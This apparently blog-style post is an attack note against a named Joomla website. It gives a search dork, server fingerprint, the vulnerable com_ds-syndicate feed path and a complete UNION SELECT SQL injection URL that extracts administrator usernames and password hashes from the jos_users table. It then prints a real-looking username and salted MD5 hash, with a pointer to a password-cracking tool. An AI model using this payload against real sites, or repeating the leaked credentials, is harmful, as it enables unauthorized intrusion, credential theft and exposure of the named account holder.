#[!] Dork: com_ds-syndicate
#[!] Target:
### http://www.birminghamfed.com:80/
### Server banner: Apache/2.0.52 (Red Hat)
### Operating system: Unix
### Web server: Apache 2.x
#[!] Bug: components/com_ds-syndicate/feed/
#[!] Help Tool: Joomla Password Cracker
############################################
http://www.birminghamfed.com/main/components/com_ds-syndicate/feed/feed-1%20union%20all%20select%201,concat(gid,0x3a,username,char(58),password),3,4,5,6,7,8,9,
10,11,12,13,14,15,16,17,18,19,20%20from%20jos_users%20where%20gid=25%20limit%201,1--.xml
10,11,12,13,14,15,16,17,18,19,20%20from%20jos_users%20where%20gid=25%20limit%201,1--.xml
username: crodgers
password: e63b8933b2a2ef1f373d806bcf9b1e8e:9DrtWnsnFdB6JWsF ----->md5 encryption with salt...so we need to crack it first....
Result:

No comments:
Post a Comment